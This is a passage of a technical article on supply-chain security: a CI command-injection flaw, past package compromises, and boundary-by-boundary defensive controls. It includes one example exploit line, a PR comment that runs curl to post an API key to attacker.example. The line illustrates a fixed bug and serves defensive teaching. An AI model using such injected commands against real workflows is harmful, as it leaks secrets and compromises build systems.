&lt;p&gt;The &lt;code&gt;if:&lt;/code&gt; block above it gated only on &lt;code&gt;startsWith(comment.body, '/review')&lt;/code&gt;. There was no &lt;code&gt;comment.author_association&lt;/code&gt; check. Anyone who could comment on a PR, including a drive-by from a public fork, could trigger this workflow. The job loaded &lt;code&gt;OPENROUTER_API_KEY&lt;/code&gt; from AWS Secrets Manager, and ran with &lt;code&gt;pull-requests: write&lt;/code&gt;, &lt;code&gt;issues: write&lt;/code&gt;, and AWS OIDC (OpenID Connect short-lived workload identity, used here instead of long-lived API keys) in scope.&lt;/p&gt;

&lt;p&gt;A comment body of &lt;code&gt;/review"; curl -X POST attacker.example/x -d "$OPENROUTER_API_KEY&lt;/code&gt; would have run on the next CI build. CWE-78: OS command injection, untrusted input concatenated into a shell command. Found, scoped, fixed in a four-line diff.&lt;/p&gt;

&lt;p&gt;Two attacks, very different mechanics. axios was a credential-theft → publish → postinstall chain at the registry boundary. The CWE-78 was a comment-string interpolation at the workflow boundary. The connection: in both cases the attacker didn't write code "in" the repo. They injected code by abusing a trust relationship. We trusted axios's npm releases; we trusted GitHub event input. The perimeter is no longer your application. It's everything that runs before, during, and after your build, and the defense has to live in those same places.&lt;/p&gt;

&lt;p&gt;I work on a monorepo spanning multiple projects (a single git repository hosting many services and libraries, JavaScript and TypeScript in our case, but the framework below maps to any monorepo or polyrepo, any language). A month after &lt;code&gt;axios@1.14.1&lt;/code&gt; shipped, a Slack message landed in our channel: &lt;em&gt;"we have Wiz, SonarCloud, gitleaks, Renovate, but are we good?"&lt;/em&gt; Seven days later I had a triaged P0/P1/P2 list (12 P0s on auth, secrets, registry trust; 18 P1s on pinning, permissions, lifecycle; 17 P2s on logging, SBOM, hardening) and a branch with 48 files changed and +2,487 / −646 lines of supply-chain controls.&lt;/p&gt;

&lt;p&gt;What follows is the framework I use, the specific findings I hit, the trade-offs I made, and the equivalent control in your stack, whether your repo is npm, pip, Maven, Go modules, Cargo, or RubyGems; whether your CI is GitHub Actions, GitLab, Buildkite, or Jenkins. The worked example here is pnpm and GitHub Actions because that's where I shipped it. The boundaries are stack-neutral.&lt;/p&gt;




&lt;h2&gt;
  
  
  Where the attack surface actually lives now
&lt;/h2&gt;

&lt;p&gt;Your application's attack surface is bounded. A handful of endpoints, an auth system, a database. You can audit it, pen-test it, threat-model it on a whiteboard in an afternoon.&lt;/p&gt;

&lt;p&gt;Your supply chain is not bounded. It's the transitive closure of every package you import, every CI Action / GitLab include / Buildkite plugin in every workflow, every base image &lt;code&gt;FROM&lt;/code&gt; line in every Dockerfile, every binary your CI runner downloads at build time, every preset, every fork, every "trusted" community helper.&lt;/p&gt;

&lt;p&gt;The math doesn't work in your favour. A typical mid-sized application resolves on the order of 1,000–3,000 transitive dependencies in its lockfile (the resolved-versions file your package manager writes: &lt;code&gt;package-lock.json&lt;/code&gt;, &lt;code&gt;Pipfile.lock&lt;/code&gt;, &lt;code&gt;Cargo.lock&lt;/code&gt;, &lt;code&gt;Gemfile.lock&lt;/code&gt;, &lt;code&gt;go.sum&lt;/code&gt;). A typical CI pipeline chains 10–30 third-party Actions / plugins. Across a multi-year horizon, the probability that none of those maintainers gets phished, social-engineered, or leaks a publish token approaches zero.&lt;/p&gt;

&lt;p&gt;Recent incidents to anchor frequency:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;2018: &lt;code&gt;event-stream&lt;/code&gt; (npm advisory 737):&lt;/strong&gt; maintainer handed package to a malicious "helpful contributor" who added a payload in a sub-dependency. Targeted exfiltration of private keys from the Copay/&lt;code&gt;copay-dash&lt;/code&gt; Bitcoin wallet specifically; conditional payload, no effect on other consumers.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2021: &lt;code&gt;ua-parser-js&lt;/code&gt;:&lt;/strong&gt; npm account takeover. Crypto miner and credential theft on every install. ~4 hours before takedown.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2021: &lt;code&gt;codecov&lt;/code&gt; bash uploader (CVE-2021-32699):&lt;/strong&gt; modified upload script harvested CI environment variables. HashiCorp, Twilio, Confluent affected.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2022: &lt;code&gt;node-ipc&lt;/code&gt; (CVE-2022-23812):&lt;/strong&gt; maintainer protestware. Wiped files on Russian and Belarusian IPs.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2024: &lt;code&gt;xz-utils&lt;/code&gt; (CVE-2024-3094):&lt;/strong&gt; multi-year insider. The "Jia Tan" persona spent ~2 years building trust before merging an OpenSSH authentication backdoor via &lt;code&gt;liblzma&lt;/code&gt; linkage with a specific Ed448 key. Discovered by Postgres engineer Andres Freund investigating ~500 ms of &lt;code&gt;sshd&lt;/code&gt; login latency, before the affected versions reached most stable distributions.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2024: &lt;code&gt;@solana/web3.js&lt;/code&gt; (GHSA-7493-mqf3-cv5g):&lt;/strong&gt; npm token compromise. Wallet drainer in published versions for ~5 hours.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2025: &lt;code&gt;tj-actions/changed-files&lt;/code&gt; (CVE-2025-30066):&lt;/strong&gt; chained through &lt;code&gt;reviewdog/action-setup&lt;/code&gt; (CVE-2025-30154) → stolen PAT → retroactive semver-tag rewrite. ~218 repos confirmed leaked secrets out of ~23,000 references per StepSecurity / Wiz post-incident telemetry.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2025: Shai-Hulud npm worm:&lt;/strong&gt; the first true self-replicating npm worm. A &lt;code&gt;postinstall&lt;/code&gt; harvested maintainer npm tokens and re-published the worm into every other package the victim maintained. ~180 packages compromised across multiple maintainer namespaces.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2025: Nx &lt;code&gt;s1ngularity&lt;/code&gt; worm:&lt;/strong&gt; npm postinstall on compromised Nx versions harvested GitHub PATs, SSH keys, and crypto wallets from build hosts; backdoored downstream &lt;code&gt;nx-init-&lt;/code&gt; repositories. Directly relevant to anyone on an Nx monorepo.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2026: &lt;code&gt;axios@1.14.1&lt;/code&gt;:&lt;/strong&gt; as above.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Strip the variations and you get four primitives that every modern attack chains: &lt;strong&gt;dependency injection&lt;/strong&gt; (typosquats, dependency confusion, maintainer compromise), &lt;strong&gt;build-time injection&lt;/strong&gt; (postinstall hooks, curl-bashed installers, malicious Actions), &lt;strong&gt;mutable-reference rewrite&lt;/strong&gt; (tag rewrites, branch tracking, CDN URLs without integrity), and &lt;strong&gt;trust-relationship abuse&lt;/strong&gt; (compromise a tooling vendor, an MFA, a token in a CI log). axios chained (4) → (1) → (2). tj-actions chained (4) → (1) → (3) → (2). Any single layer of defense would have broken either chain. Most repos had none of them.&lt;/p&gt;




&lt;h2&gt;
  
  
  The twelve boundaries
&lt;/h2&gt;

&lt;p&gt;Security engineers think in &lt;strong&gt;boundaries&lt;/strong&gt;: points where trust transfers from one entity to another. Each boundary is a place attackers operate and a place defenders need a control. The twelve below split into three phases: what enters your repo (1–4); what runs during your build (5–9); what ships at runtime (10–12); plus a final section on what to do when one of them fails. Some will.&lt;/p&gt;

&lt;h3&gt;
  
  
  Phase 1. Source-side: what enters your repo
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Boundary 1: Source → Repository (Who can write to &lt;code&gt;main&lt;/code&gt;?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; insider with too-broad write access; accidental merge of malicious code.&lt;br&gt;
&lt;strong&gt;Controls:&lt;/strong&gt; branch protection, required reviewers, CODEOWNERS for security-sensitive paths (workflows, Dockerfiles, dependency manifests). Force-push protection on protected branches. Required status checks must include the controls below.&lt;/p&gt;

&lt;p&gt;The forge-level (GitHub / GitLab / Bitbucket / Gerrit) primitives differ; the rule is identical: humans cannot push to &lt;code&gt;main&lt;/code&gt;; only the merge bot can, and only after policy passes.&lt;/p&gt;
&lt;h4&gt;
  
  
  Boundary 2: Maintainer → Package (Is this dependency safe?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; typosquats, dependency confusion (publishing a public package whose name shadows a private one, tricking the resolver), maintainer compromise. &lt;code&gt;axios@1.14.1&lt;/code&gt; is the canonical example of the third: published from a stolen credential, malicious for three hours, gone afterwards.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Registry-time controls:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Pin to immutable identifiers.&lt;/strong&gt; Lockfile committed; exact-version constraints; no caret/tilde ranges in production dependencies; &lt;code&gt;pnpm install --frozen-lockfile&lt;/code&gt; (or &lt;code&gt;npm ci&lt;/code&gt;, &lt;code&gt;pip install --require-hashes&lt;/code&gt;, &lt;code&gt;cargo --frozen --locked&lt;/code&gt;, &lt;code&gt;mvn -B verify&lt;/code&gt;, &lt;code&gt;bundle install --frozen&lt;/code&gt;, &lt;code&gt;dotnet restore --locked-mode&lt;/code&gt;) in CI. The general invariant: every dependency entry resolves to a content-addressed artifact, not a URL.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Cooldown on freshly published versions.&lt;/strong&gt; Reject packages younger than N days, on the premise that fresh-publish malware is detected and yanked within 24–72 hours. The premise has limits (&lt;code&gt;xz-utils&lt;/code&gt; ran for ~2 years undetected), so this control buys hours-to-days of latency, not certainty.&lt;br&gt;
&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;   &lt;span class="c1"&gt;# pnpm-workspace.yaml. value is in minutes; 4320 min = 72 h = 3 days&lt;/span&gt;
   &lt;span class="na"&gt;minimumReleaseAge&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;4320&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;&lt;code&gt;axios@1.14.1&lt;/code&gt; was unpublished within three hours. With &lt;code&gt;minimumReleaseAge: 4320&lt;/code&gt;, pnpm would have refused to install it for 72 hours after publish. By the time the install would have unblocked, the malicious version was already gone.&lt;/p&gt;

&lt;p&gt;Stack-neutral: pnpm has this natively. Renovate's &lt;code&gt;minimumReleaseAge&lt;/code&gt; config covers any ecosystem Renovate manages: npm, Maven, PyPI, Go, Cargo, NuGet, RubyGems, Helm, Docker, GH Actions, Terraform. For stacks without native or Renovate support, layer reputation signals: &lt;strong&gt;Socket&lt;/strong&gt; (behavioural risk score), &lt;strong&gt;Phylum&lt;/strong&gt; (heuristic quarantine), &lt;strong&gt;OSV-Scanner&lt;/strong&gt; + &lt;strong&gt;EPSS&lt;/strong&gt; scores for exploit-likelihood prioritisation, &lt;strong&gt;OpenSSF Scorecard&lt;/strong&gt; for upstream maintenance health, &lt;code&gt;npm audit signatures&lt;/code&gt; for registry signature verification.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Provenance.&lt;/strong&gt; Where available, prefer packages published with provenance attestations. &lt;code&gt;npm publish --provenance&lt;/code&gt; (since npm 9.5) records a signed Sigstore provenance entry binding the published tarball to the GitHub Actions workflow that built it. PyPI Trusted Publishers + PEP 740 attestations are the Python equivalent. Maven Central PGP signatures + &lt;code&gt;sigstore-maven-plugin&lt;/code&gt; for Java. Provenance doesn't stop a credential-theft attack like axios (the malicious workflow would still produce a signed entry), but it gives forensics a starting point.&lt;/li&gt;
&lt;/ol&gt;
&lt;h4&gt;
  
  
  Boundary 3: Registry → Lockfile (Is the resolved artifact what we think it is?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; registry compromise, off-registry tarballs without integrity, mid-flight tampering.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt; lockfile committed; integrity hash (&lt;code&gt;sha512:&lt;/code&gt;, &lt;code&gt;sha256:&lt;/code&gt;, OCI digest) on every entry; CI install command refuses to mutate the lockfile. &lt;strong&gt;Easy thing to miss:&lt;/strong&gt; a lockfile entry like &lt;code&gt;tarball: https://cdn.somehost.com/foo.tgz&lt;/code&gt; without an &lt;code&gt;integrity:&lt;/code&gt; field is functionally trust-the-CDN. Whoever serves that URL can serve different bytes tomorrow than they served today, and your install will accept them. Audit yours for entries where the hash field is empty or pointing to a URL the registry doesn't verify.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# tools/scripts/verify-supply-chain.sh runs in CI.&lt;/span&gt;
&lt;span class="c"&gt;# Fails if the lockfile contains any off-registry tarball not on this allowlist.&lt;/span&gt;
&lt;span class="nv"&gt;EXPECTED_TARBALLS&lt;/span&gt;&lt;span class="o"&gt;=(&lt;/span&gt;
  &lt;span class="s2"&gt;"https://cdn.sheetjs.com/xlsx-0.20.3/xlsx-0.20.3.tgz"&lt;/span&gt;  &lt;span class="c"&gt;# SheetJS withdrew xlsx from npm in 2023&lt;/span&gt;
&lt;span class="o"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This single grep-equivalent check would also have flagged the &lt;code&gt;axios@1.14.1&lt;/code&gt; situation early in retrospect: a brand-new transitive (&lt;code&gt;plain-crypto-js@4.2.1&lt;/code&gt;) appeared in the lockfile diff. A mandatory PR-time review on lockfile additions catches what the eye doesn't.&lt;/p&gt;

&lt;p&gt;The general invariant translates: pip's &lt;code&gt;--require-hashes&lt;/code&gt;, Cargo's checksum field, Maven's &lt;code&gt;--strict-checksums&lt;/code&gt;, NuGet package signing, Go's module sum database. Every modern package manager has the primitive. The discipline is auditing for entries where it isn't enforced.&lt;/p&gt;

&lt;h4&gt;
  
  
  Boundary 4: Install → Lifecycle scripts (What runs on install?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; malicious lifecycle hooks. The axios attack's payload ran here. &lt;code&gt;plain-crypto-js@4.2.1&lt;/code&gt;'s entire malicious behaviour was a &lt;code&gt;postinstall: node setup.js&lt;/code&gt;. Without that hook, the package would have sat on disk doing nothing until something &lt;code&gt;require()&lt;/code&gt;'d it, and &lt;code&gt;axios&lt;/code&gt; doesn't import &lt;code&gt;plain-crypto-js&lt;/code&gt;. The postinstall was the only thing that turned a passive disk write into RCE during install.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Default-deny on install scripts&lt;/strong&gt;, allowlist of who may run them:
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="w"&gt;   &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
     &lt;/span&gt;&lt;span class="nl"&gt;"pnpm"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
       &lt;/span&gt;&lt;span class="nl"&gt;"onlyBuiltDependencies"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="w"&gt;
         &lt;/span&gt;&lt;span class="s2"&gt;"esbuild"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
         &lt;/span&gt;&lt;span class="s2"&gt;"@swc/core"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
         &lt;/span&gt;&lt;span class="s2"&gt;"@datadog/native-iast-taint-tracking"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
         &lt;/span&gt;&lt;span class="s2"&gt;"prisma"&lt;/span&gt;&lt;span class="w"&gt;
       &lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt;
     &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
   &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;plain-crypto-js&lt;/code&gt; would not have been on any team's allowlist. &lt;code&gt;pnpm install --ignore-scripts&lt;/code&gt; (read-only CI workflows) and &lt;code&gt;onlyBuiltDependencies&lt;/code&gt; (pnpm 10) each, independently, neutralise the postinstall vector.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Behavioural quarantine.&lt;/strong&gt; &lt;code&gt;Socket&lt;/code&gt; and &lt;code&gt;Phylum&lt;/code&gt; analyse new transitives for suspicious patterns (network calls, file-system access, dynamic eval) before they reach your lockfile. &lt;code&gt;npq&lt;/code&gt; wraps &lt;code&gt;npm install&lt;/code&gt; to prompt before installing freshly published packages. None of these would catch a sufficiently subtle payload, but &lt;code&gt;plain-crypto-js&lt;/code&gt;'s &lt;code&gt;node setup.js&lt;/code&gt; → C2 download is exactly the shape they flag.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Build-host sandboxing.&lt;/strong&gt; Run installs inside an ephemeral container with no network egress except to the registry; or use Bubblewrap / Firejail / Chainguard's hardened images. Defence-in-depth for the case where the lifecycle gate fails open.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;The limit:&lt;/strong&gt; lifecycle gates block &lt;code&gt;preinstall&lt;/code&gt; / &lt;code&gt;install&lt;/code&gt; / &lt;code&gt;postinstall&lt;/code&gt;. They do not prevent module-load-time top-level execution when an attacker-controlled package gets &lt;code&gt;require()&lt;/code&gt;'d or &lt;code&gt;import&lt;/code&gt;'d during &lt;code&gt;vitest&lt;/code&gt;, &lt;code&gt;tsc&lt;/code&gt;, &lt;code&gt;eslint&lt;/code&gt;, or any other tool that imports your code graph. The &lt;code&gt;minimumReleaseAge&lt;/code&gt; cooldown (Boundary 2) is the layer behind that.&lt;/p&gt;

&lt;p&gt;Stack equivalents: pip's risky surface is &lt;code&gt;setup.py&lt;/code&gt; install hooks (mitigate with &lt;code&gt;--only-binary=:all:&lt;/code&gt;); Ruby's is &lt;code&gt;gem install&lt;/code&gt; running &lt;code&gt;extconf.rb&lt;/code&gt;; Cargo's is &lt;code&gt;build.rs&lt;/code&gt; (sandbox via Bazel &lt;code&gt;rules_rust&lt;/code&gt; or &lt;code&gt;cargo-deny&lt;/code&gt; bans); .NET's modern PackageReference does not run scripts (legacy &lt;code&gt;packages.config&lt;/code&gt; does); Maven's and Gradle's are build plugins (audit &lt;code&gt;&amp;lt;build&amp;gt;&amp;lt;plugins&amp;gt;&lt;/code&gt; and &lt;code&gt;buildscript { dependencies }&lt;/code&gt;).&lt;/p&gt;

&lt;h3&gt;
  
  
  Phase 2. Build-side: what runs during your build
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Boundary 5: Source → Image (Is our build environment trustworthy?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; base image tag rewrite, secrets baked into image layers.&lt;br&gt;
&lt;strong&gt;Controls:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Pin every &lt;code&gt;FROM&lt;/code&gt; by &lt;code&gt;@sha256:&amp;lt;digest&amp;gt;&lt;/code&gt;.&lt;/strong&gt; Tags are mutable; digests are content-addressed (the SHA changes if the bytes change, so a rewrite is detectable).
&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight docker"&gt;&lt;code&gt;   FROM node:20.11.1-alpine3.19@sha256:735dd688da64d22ebd9... AS base
   USER node
   CMD ["node", "dist/main.js"]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Drop privileges with &lt;code&gt;USER&lt;/code&gt; before &lt;code&gt;CMD&lt;/code&gt;.&lt;/strong&gt; For Node images: &lt;code&gt;USER node&lt;/code&gt;. For nginx: switch to &lt;code&gt;nginxinc/nginx-unprivileged&lt;/code&gt; (drop-in non-root replacement listening on 8080).&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Never put secrets in &lt;code&gt;ARG&lt;/code&gt; defaults&lt;/strong&gt;: they persist in &lt;code&gt;docker history&lt;/code&gt;. Use BuildKit &lt;code&gt;--mount=type=secret&lt;/code&gt; for build-time secrets.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Hermetic builds for the highest tier.&lt;/strong&gt; Bazel &lt;code&gt;rules_oci&lt;/code&gt;, Nix &lt;code&gt;dockerTools&lt;/code&gt;, Chainguard's &lt;code&gt;apko&lt;/code&gt; + &lt;code&gt;melange&lt;/code&gt; produce reproducible images where every byte is content-addressed back to source. Overkill for most teams; required for SLSA L3+.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;h4&gt;
  
  
  Boundary 6: Image → Registry (Can downstream verify what we shipped?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; image tag rewrite at the registry; image swap; "did we actually ship this build?" forensics gap.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt; &lt;strong&gt;cosign keyless signing via Sigstore.&lt;/strong&gt; Sigstore is a free signing service; &lt;strong&gt;Fulcio&lt;/strong&gt; is its short-lived certificate authority; &lt;strong&gt;Rekor&lt;/strong&gt; is its public transparency log; the &lt;strong&gt;SET&lt;/strong&gt; (Signed Entry Timestamp) is Rekor's tamper-proof timestamp binding the signature to a moment when the cert was still valid. GitHub Actions OIDC issues a short-lived signing identity, Fulcio mints a certificate valid for ~10 minutes, and the signature is recorded in Rekor.&lt;/p&gt;

&lt;p&gt;Treat Rekor as load-bearing, not optional. The Fulcio cert expires almost immediately; what makes a keyless signature verifiable hours or years later is the Rekor inclusion proof. A &lt;code&gt;cosign verify&lt;/code&gt; that doesn't check the SET is meaningless after cert expiry.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Verify with workflow-path anchoring&lt;/strong&gt;, not a loose org regex:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;cosign verify &amp;lt;image&amp;gt;@&amp;lt;digest&amp;gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--certificate-identity-regexp&lt;/span&gt; &lt;span class="s2"&gt;"^https://github&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;com/yourorg/yourrepo/&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;github/workflows/release&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;yml@refs/heads/main$"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--certificate-oidc-issuer&lt;/span&gt; &lt;span class="s2"&gt;"https://token.actions.githubusercontent.com"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--certificate-github-workflow-repository&lt;/span&gt; &lt;span class="s2"&gt;"yourorg/yourrepo"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--certificate-github-workflow-ref&lt;/span&gt; &lt;span class="s2"&gt;"refs/heads/main"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;An open &lt;code&gt;^https://github.com/yourorg/&lt;/code&gt; regex matches any workflow under the org, including a malicious workflow added in a fork and run via &lt;code&gt;pull_request_target&lt;/code&gt;. Anchor on the workflow path, the ref, AND test the regex with a known-different workflow before relying on it. Unanchored regexes (missing &lt;code&gt;^&lt;/code&gt; or &lt;code&gt;$&lt;/code&gt;) match more workflows than you intended.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Signing alone does not satisfy SLSA&lt;/strong&gt; (Supply-chain Levels for Software Artifacts, a framework grading build provenance trustworthiness). The signature proves &lt;em&gt;who&lt;/em&gt; built the image, not &lt;em&gt;how&lt;/em&gt;. SLSA Build L3 requires provenance attestations in &lt;code&gt;in-toto&lt;/code&gt; format (&lt;code&gt;https://slsa.dev/provenance/v1&lt;/code&gt; predicate), produced by &lt;code&gt;cosign attest --predicate&lt;/code&gt; from a hardened, isolated builder such as &lt;code&gt;slsa-github-generator&lt;/code&gt;. Verify with &lt;code&gt;cosign verify-attestation&lt;/code&gt;. The signature is the foundation. The attestation chain is the rest of the building.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;A signature you don't verify at deploy time is theatre.&lt;/strong&gt; Wire &lt;code&gt;cosign verify&lt;/code&gt; into a Kubernetes admission controller (&lt;strong&gt;Kyverno&lt;/strong&gt; &lt;code&gt;verifyImages&lt;/code&gt;, &lt;strong&gt;Connaisseur&lt;/strong&gt;, or &lt;strong&gt;Sigstore policy-controller&lt;/strong&gt;) so the cluster refuses to schedule unsigned or wrong-identity images. GitHub's native &lt;code&gt;gh attestation verify&lt;/code&gt; (GA 2024) is the simplest verification entry-point if you're not on Kubernetes.&lt;/p&gt;

&lt;p&gt;Stack-agnostic: cosign works on any container image registry (ECR, GHCR, ACR, GAR, Harbor, Artifactory, Quay) and on generic blobs via &lt;code&gt;cosign sign-blob&lt;/code&gt;. Sigstore Fulcio currently trusts OIDC issuers from GitHub, GitLab, Buildkite, CircleCI, Google, Microsoft. Same &lt;code&gt;cosign sign --identity-token&lt;/code&gt; flow, different &lt;code&gt;iss&lt;/code&gt; claim. PEP 740 attestations + &lt;code&gt;python -m sigstore&lt;/code&gt; cover Python wheels; &lt;code&gt;sigstore-maven-plugin&lt;/code&gt; covers Java JARs.&lt;/p&gt;

&lt;h4&gt;
  
  
  Boundary 7: Tag → Commit (What does this &lt;code&gt;uses:&lt;/code&gt; / include / plugin actually point to?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;This is the boundary tj-actions exploited.&lt;/strong&gt; A line like &lt;code&gt;uses: tj-actions/changed-files@v45&lt;/code&gt; resolves at build time to whatever commit the &lt;code&gt;v45&lt;/code&gt; tag currently references. Tags are mutable. Commit SHAs are not.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt; pin every external &lt;code&gt;uses:&lt;/code&gt; to a 40-character commit SHA with a tag comment.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd&lt;/span&gt; &lt;span class="c1"&gt;# v6&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;pulumi/actions@8582a9e8cc630786854029b4e09281acd6794b58&lt;/span&gt; &lt;span class="c1"&gt;# v6&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Enforce in CI with &lt;code&gt;pinact run --check --verify&lt;/code&gt;. It fails the PR if anything is unpinned, and flags drift between the pinned SHA and the SHA the upstream tag currently resolves to. It catches inadvertent drift. It does not by itself defeat a tag-rewrite attack. &lt;code&gt;pinact&lt;/code&gt; will surface the mismatch but cannot tell you which side is hostile. Pair it with a higher-trust signal: Sigstore attestation verification, GitHub's &lt;code&gt;gh attestation verify&lt;/code&gt; for Action artifacts (GA 2024), &lt;code&gt;StepSecurity Harden-Runner&lt;/code&gt; for egress-policy + tampering detection on the runner, or human review of any flagged drift.&lt;/p&gt;

&lt;p&gt;When we started, none of our 110 &lt;code&gt;uses:&lt;/code&gt; lines were SHA-pinned. That included &lt;code&gt;pulumi/actions&lt;/code&gt; (cloud-deploy authority), &lt;code&gt;lasith-kg/dispatch-workflow&lt;/code&gt; (single maintainer), &lt;code&gt;aws-actions/configure-aws-credentials&lt;/code&gt; (×11), and &lt;code&gt;docker/build-push-action&lt;/code&gt; (×3, ECR push). They all are now, with a CI gate so they stay that way.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Translate to your CI:&lt;/strong&gt; GitLab &lt;code&gt;include:&lt;/code&gt; should pin &lt;code&gt;ref:&lt;/code&gt; to a SHA, not &lt;code&gt;main&lt;/code&gt;. Buildkite plugins should pin &lt;code&gt;plugin@&amp;lt;sha&amp;gt;&lt;/code&gt;, not &lt;code&gt;@v1&lt;/code&gt;. CircleCI orbs are best inlined or vendored. Jenkins shared libraries should pin &lt;code&gt;@Library('foo@&amp;lt;sha&amp;gt;')&lt;/code&gt;. Bazel modules pin via &lt;code&gt;MODULE.bazel.lock&lt;/code&gt;. The control: no mutable references to third-party code anywhere in CI config.&lt;/p&gt;

&lt;h4&gt;
  
  
  Boundary 8: Workflow → Secrets (What can a single compromised step exfiltrate?)
&lt;/h4&gt;

